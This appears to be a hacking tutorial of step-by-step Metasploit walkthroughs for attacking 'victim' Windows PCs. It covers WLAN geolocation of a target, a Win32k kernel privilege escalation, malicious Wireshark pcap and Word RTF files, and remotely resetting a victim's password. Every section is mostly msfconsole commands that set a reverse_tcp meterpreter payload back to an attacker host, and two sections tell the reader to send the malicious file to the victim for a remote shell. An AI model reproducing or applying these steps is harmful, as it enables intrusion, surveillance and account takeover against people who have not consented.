Gather WLAN Information and Geolocation of Remote Windows, Linux or MAC PC

Enumerate wireless networks visible to the target device. Optionally geolocate the target by gathering local wireless networks and performing a lookup against Google APIs.

Exploit Targets
Windows 7
Linux
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use post/multi/gather/wlan_geolocate
msf exploit (wlan_geolocate)>set payload windows/meterpreter/reverse_tcp
msf exploit (wlan_geolocate)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (wlan_geolocate)>set session 1
msf exploit (wlan_geolocate)>exploit


Now Wireless List will stored on your local computer
/root/.msf4/loot/


Hack Remote Windows PC using Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms13_053_schlamperei
msf exploit (ms13_053_schlamperei)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_053_schlamperei)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms13_053_schlamperei)>set session 2
msf exploit (ms13_053_schlamperei)>exploit

Hack Remote PC using Wireshark wiretap/mpeg.c Stack Buffer Overflow

This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.)

Exploit Targets
Wireshark <= 1.8.12/1.10.5

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/wireshark_mpeg_overflow
msf exploit (wireshark_mpeg_overflow)>set payload windows/meterpreter/reverse_tcp
msf exploit (wireshark_mpeg_overflow)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (wireshark_mpeg_overflow)>set target 1
msf exploit (wireshark_mpeg_overflow)>exploit  


After we successfully generate the malicious pcap File, it will stored on your local computer
/root/.msf4/local/mpeg_overflow.pcap


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send your mpeg_overflow.pcap files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer


Hack Remote Victim PC with MS Office Document

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a list override count field can be modified to treat one structure as another. This bug was originally seen being exploited in the wild starting in April 2014. This module was created by reversing a public malware sample.

Exploit Targets
Microsoft Office 2010 SP2 

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/ms14_017_rtf
msf exploit (ms14_017_rtf)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms14_017_rtf)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms14_017_rtf)>exploit  


After we successfully generate the malicious rtf File, it will stored on your local computer
/root/.msf4/local/msf.rtf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send your msf.rtf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Set New Password of Victim PC Remotely

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account's password on a remote host to avoid the error, 'System error 1907 has occurred,' which is caused when the account policy enforces a password change before the next login.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use post/windows/manage/change_password
msf exploit (change_password)>set payload windows/meterpreter/reverse_tcp
msf exploit (change_password)>set old_password (Type your old password)
msf exploit (change_password)>set new_password (New password You want to set)
msf exploit (change_password)>set smbuser (User name of PC)
msf exploit (change_password)>set session 1
msf exploit (change_password)>exploit